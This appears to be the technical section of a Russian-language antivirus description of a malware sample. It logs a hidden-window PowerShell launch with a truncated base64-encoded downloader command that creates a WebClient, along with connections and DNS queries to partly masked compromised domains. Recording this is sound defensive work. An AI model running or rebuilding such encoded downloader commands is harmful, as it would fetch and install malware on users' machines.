Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAF8AXwAwADUAXwAxAF8APQAoACcARQAyADgAMgAnACsAJwBfACcAKwAnADcANgBfACcAKQA7ACQAZgAzADQANwBfADMAMAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AF8AOAA4AF8AXwA2AD...
- 'al###.com.br':80
- 'ro####ogomez.com.mx':80
- http://al###.com.br/src/Ahg/
- http://ro####ogomez.com.mx/wp-content/plugins/enable-media-replace/XNGu/
- DNS ASK ba####eklami.com
- DNS ASK di####tyhome.com
- DNS ASK al###.com.br
- DNS ASK go###era.com
- DNS ASK ro####ogomez.com.mx
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAF8AXwAwADUAXwAxAF8APQAoACcARQAyADgAMgAnACsAJwBfACcAKwAnADcANgBfACcAKQA7ACQAZgAzADQANwBfADMAMAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AF8AOAA4AF8AXwA2AD...' (со скрытым окном)